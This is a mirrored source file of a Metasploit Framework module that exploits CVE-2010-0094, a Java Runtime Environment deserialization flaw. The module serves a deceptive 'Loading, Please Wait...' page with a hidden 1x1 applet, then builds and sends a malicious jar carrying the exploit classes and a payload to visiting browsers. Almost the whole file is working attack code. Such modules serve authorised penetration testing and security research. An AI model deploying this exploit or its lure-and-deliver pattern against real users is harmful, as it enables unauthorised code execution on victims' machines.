Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/multi/browser/java_rmi_connection_impl.rb
19758 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = ExcellentRanking

8


9
  include Msf::Exploit::Remote::HttpServer::HTML

10


11
  #

12
  # Superceded by java_trusted_chain

13
  #

14
  # include Msf::Exploit::Remote::BrowserAutopwn

15
  # autopwn_info({ :javascript => false })

16


17
  def initialize(info = {})

18
    super(

19
      update_info(

20
        info,

21
        'Name' => 'Java RMIConnectionImpl Deserialization Privilege Escalation',

22
        'Description' => %q{

23
          This module exploits a vulnerability in the Java Runtime Environment

24
          that allows to deserialize a MarshalledObject containing a custom

25
          classloader under a privileged context. The vulnerability affects

26
          version 6 prior to update 19 and version 5 prior to update 23.

27
        },

28
        'License' => MSF_LICENSE,

29
        'Author' => [

30
          'Sami Koivu', # Discovery

31
          'Matthias Kaiser', # PoC

32
          'egypt' # metasploit module

33
        ],

34
        'References' => [

35
          [ 'CVE', '2010-0094' ],

36
          [ 'OSVDB', '63484' ],

37
          [ 'URL', 'http://slightlyrandombrokenthoughts.blogspot.com/2010/04/java-rmiconnectionimpl-deserialization.html' ],

38
        ],

39
        'Platform' => [ 'java' ],

40
        'Payload' => { 'Space' => 20480, 'BadChars' => '', 'DisableNops' => true },

41
        'Targets' => [

42
          [

43
            'Generic (Java Payload)',

44
            {

45
              'Arch' => ARCH_JAVA,

46
            }

47
          ],

48
        ],

49
        'DefaultTarget' => 0,

50
        'DisclosureDate' => '2010-03-31',

51
        'Notes' => {

52
          'Reliability' => UNKNOWN_RELIABILITY,

53
          'Stability' => UNKNOWN_STABILITY,

54
          'SideEffects' => UNKNOWN_SIDE_EFFECTS

55
        }

56
      )

57
    )

58
  end

59


60
  def on_request_uri(cli, request)

61
    if not request.uri.match(/\.jar$/i)

62
      if not request.uri.match(/\/$/)

63
        send_redirect(cli, get_resource() + '/', '')

64
        return

65
      end

66


67
      print_status("#{self.name} handling request")

68


69
      send_response_html(cli, generate_html, { 'Content-Type' => 'text/html' })

70
      return

71
    end

72


73
    paths = [

74
      [ "Exploit.class" ],

75
      [ "Exploit$1.class" ],

76
      [ "Exploit$1$1.class" ],

77
      [ "Exploit$2.class" ],

78
      [ "Payloader.class" ],

79
      [ "PayloadClassLoader.class" ],

80
      [ "payload.ser" ],

81
    ]

82


83
    p = regenerate_payload(cli)

84
    jar = p.encoded_jar

85
    paths.each do |path|

86
      1.upto(path.length - 1) do |idx|

87
        full = path[0, idx].join("/") + "/"

88
        if !(jar.entries.map { |e| e.name }.include?(full))

89
          jar.add_file(full, '')

90
        end

91
      end

92
      fd = File.open(File.join(Msf::Config.data_directory, "exploits", "cve-2010-0094", path), "rb")

93
      data = fd.read(fd.stat.size)

94
      jar.add_file(path.join("/"), data)

95
      fd.close

96
    end

97


98
    print_status("Sending Applet.jar")

99
    send_response(cli, jar.pack, { 'Content-Type' => "application/octet-stream" })

100


101
    handler(cli)

102
  end

103


104
  def generate_html

105
    html = "<html><head><title>Loading, Please Wait...</title></head>"

106
    html += "<body><center><p>Loading, Please Wait...</p></center>"

107
    html += "<applet archive=\"Exploit.jar\" code=\"Exploit.class\" width=\"1\" height=\"1\">"

108
    html += "</applet></body></html>"

109
    return html

110
  end

111
end

112


113